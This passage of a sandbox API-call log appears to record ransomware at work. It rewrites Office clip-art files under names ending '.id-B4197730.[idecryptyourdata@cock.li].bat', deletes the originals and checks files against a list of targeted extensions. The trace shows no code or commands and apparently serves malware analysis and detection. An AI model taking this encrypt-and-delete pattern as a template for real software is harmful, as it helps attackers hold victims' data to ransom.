[0198.748] GetLastError () returned 0x0 [0198.748] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2394, lpOverlapped=0x0) returned 1 [0198.750] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x23a0, lpOverlapped=0x0) returned 1 [0198.752] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.752] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.752] SetEndOfFile (hFile=0x350) returned 1 [0198.752] CloseHandle (hObject=0x350) returned 1 [0198.752] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.752] SetEndOfFile (hFile=0x37c) returned 1 [0198.753] CloseHandle (hObject=0x37c) returned 1 [0198.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf")) returned 1 [0198.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 68 [0198.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 68 [0198.754] lstrlenW (lpString=".doc") returned 4 [0198.754] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.754] lstrlenW (lpString=".docx") returned 5 [0198.754] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0198.754] lstrlenW (lpString=".pdf") returned 4 [0198.754] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.754] lstrlenW (lpString=".xls") returned 4 [0198.754] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.754] lstrlenW (lpString=".xlsx") returned 5 [0198.754] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0198.755] lstrlenW (lpString=".ppt") returned 4 [0198.755] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 68 [0198.755] lstrlenW (lpString=".zip") returned 4 [0198.755] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.755] lstrlenW (lpString=".rar") returned 4 [0198.755] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.755] lstrlenW (lpString=".bz2") returned 4 [0198.755] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.755] lstrlenW (lpString=".7z") returned 3 [0198.755] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 68 [0198.755] lstrlenW (lpString=".dbf") returned 4 [0198.755] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 68 [0198.755] lstrlenW (lpString=".1cd") returned 4 [0198.755] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 68 [0198.755] lstrlenW (lpString=".jpg") returned 4 [0198.755] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.755] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.756] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.756] GetLastError () returned 0x0 [0198.756] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2a44, lpOverlapped=0x0) returned 1 [0198.914] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2a50, lpOverlapped=0x0) returned 1 [0198.915] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.915] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.916] SetEndOfFile (hFile=0x350) returned 1 [0198.917] CloseHandle (hObject=0x350) returned 1 [0198.917] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.917] SetEndOfFile (hFile=0x37c) returned 1 [0198.918] CloseHandle (hObject=0x37c) returned 1 [0198.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.918] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf")) returned 1 [0198.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 68 [0198.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 68 [0198.919] lstrlenW (lpString=".doc") returned 4 [0198.919] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString=".docx") returned 5 [0198.919] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0198.919] lstrlenW (lpString=".pdf") returned 4 [0198.919] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString=".xls") returned 4 [0198.919] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.919] lstrlenW (lpString=".xlsx") returned 5 [0198.919] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0198.919] lstrlenW (lpString=".ppt") returned 4 [0198.919] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 68 [0198.919] lstrlenW (lpString=".zip") returned 4 [0198.919] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.919] lstrlenW (lpString=".rar") returned 4 [0198.919] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString=".bz2") returned 4 [0198.919] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString=".7z") returned 3 [0198.919] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 68 [0198.919] lstrlenW (lpString=".dbf") returned 4 [0198.919] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 68 [0198.919] lstrlenW (lpString=".1cd") returned 4 [0198.919] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 68 [0198.919] lstrlenW (lpString=".jpg") returned 4 [0198.919] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.920] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.920] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.188] GetLastError () returned 0x0 [0199.188] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x336a, lpOverlapped=0x0) returned 1 [0199.190] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3370, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3370, lpOverlapped=0x0) returned 1 [0199.192] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.192] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.192] SetEndOfFile (hFile=0x340) returned 1 [0199.192] CloseHandle (hObject=0x340) returned 1 [0199.192] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.192] SetEndOfFile (hFile=0x37c) returned 1 [0199.193] CloseHandle (hObject=0x37c) returned 1 [0199.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.194] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf")) returned 1 [0199.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 68 [0199.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 68 [0199.194] lstrlenW (lpString=".doc") returned 4 [0199.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.194] lstrlenW (lpString=".docx") returned 5 [0199.194] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0199.194] lstrlenW (lpString=".pdf") returned 4 [0199.195] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.195] lstrlenW (lpString=".xls") returned 4 [0199.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.195] lstrlenW (lpString=".xlsx") returned 5 [0199.195] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0199.195] lstrlenW (lpString=".ppt") returned 4 [0199.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 68 [0199.195] lstrlenW (lpString=".zip") returned 4 [0199.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.195] lstrlenW (lpString=".rar") returned 4 [0199.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.195] lstrlenW (lpString=".bz2") returned 4 [0199.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.195] lstrlenW (lpString=".7z") returned 3 [0199.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 68 [0199.195] lstrlenW (lpString=".dbf") returned 4 [0199.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 68 [0199.195] lstrlenW (lpString=".1cd") returned 4 [0199.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF") returned 68 [0199.195] lstrlenW (lpString=".jpg") returned 4 [0199.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.196] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.196] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.197] GetLastError () returned 0x0 [0199.197] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1b00, lpOverlapped=0x0) returned 1 [0199.198] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1b10, lpOverlapped=0x0) returned 1 [0199.199] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.199] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.199] SetEndOfFile (hFile=0x340) returned 1 [0199.199] CloseHandle (hObject=0x340) returned 1 [0199.200] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.200] SetEndOfFile (hFile=0x37c) returned 1 [0199.200] CloseHandle (hObject=0x37c) returned 1 [0199.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.201] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf")) returned 1 [0199.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 68 [0199.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 68 [0199.201] lstrlenW (lpString=".doc") returned 4 [0199.201] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.201] lstrlenW (lpString=".docx") returned 5 [0199.201] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0199.201] lstrlenW (lpString=".pdf") returned 4 [0199.201] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.201] lstrlenW (lpString=".xls") returned 4 [0199.201] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.201] lstrlenW (lpString=".xlsx") returned 5 [0199.201] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0199.201] lstrlenW (lpString=".ppt") returned 4 [0199.201] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 68 [0199.201] lstrlenW (lpString=".zip") returned 4 [0199.202] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.202] lstrlenW (lpString=".rar") returned 4 [0199.202] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.202] lstrlenW (lpString=".bz2") returned 4 [0199.202] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.202] lstrlenW (lpString=".7z") returned 3 [0199.202] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 68 [0199.202] lstrlenW (lpString=".dbf") returned 4 [0199.202] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 68 [0199.202] lstrlenW (lpString=".1cd") returned 4 [0199.202] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF") returned 68 [0199.202] lstrlenW (lpString=".jpg") returned 4 [0199.202] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.202] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.202] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.203] GetLastError () returned 0x0 [0199.203] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x164c, lpOverlapped=0x0) returned 1 [0199.204] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1650, lpOverlapped=0x0) returned 1 [0199.205] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.205] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.205] SetEndOfFile (hFile=0x340) returned 1 [0199.205] CloseHandle (hObject=0x340) returned 1 [0199.205] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.205] SetEndOfFile (hFile=0x37c) returned 1 [0199.206] CloseHandle (hObject=0x37c) returned 1 [0199.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.206] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf")) returned 1 [0199.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 68 [0199.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 68 [0199.207] lstrlenW (lpString=".doc") returned 4 [0199.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.207] lstrlenW (lpString=".docx") returned 5 [0199.207] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0199.207] lstrlenW (lpString=".pdf") returned 4 [0199.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.207] lstrlenW (lpString=".xls") returned 4 [0199.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.207] lstrlenW (lpString=".xlsx") returned 5 [0199.207] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0199.207] lstrlenW (lpString=".ppt") returned 4 [0199.207] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 68 [0199.207] lstrlenW (lpString=".zip") returned 4 [0199.207] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.207] lstrlenW (lpString=".rar") returned 4 [0199.208] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.208] lstrlenW (lpString=".bz2") returned 4 [0199.208] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.208] lstrlenW (lpString=".7z") returned 3 [0199.208] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 68 [0199.208] lstrlenW (lpString=".dbf") returned 4 [0199.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 68 [0199.208] lstrlenW (lpString=".1cd") returned 4 [0199.208] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF") returned 68 [0199.208] lstrlenW (lpString=".jpg") returned 4 [0199.208] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.208] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.208] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.209] GetLastError () returned 0x0 [0199.209] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x9d26, lpOverlapped=0x0) returned 1 [0199.211] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x9d30, lpOverlapped=0x0) returned 1 [0199.212] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.212] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.213] SetEndOfFile (hFile=0x340) returned 1 [0199.213] CloseHandle (hObject=0x340) returned 1 [0199.213] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.213] SetEndOfFile (hFile=0x37c) returned 1 [0199.214] CloseHandle (hObject=0x37c) returned 1 [0199.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf")) returned 1 [0199.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 68 [0199.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 68 [0199.215] lstrlenW (lpString=".doc") returned 4 [0199.215] lstrcmpiW 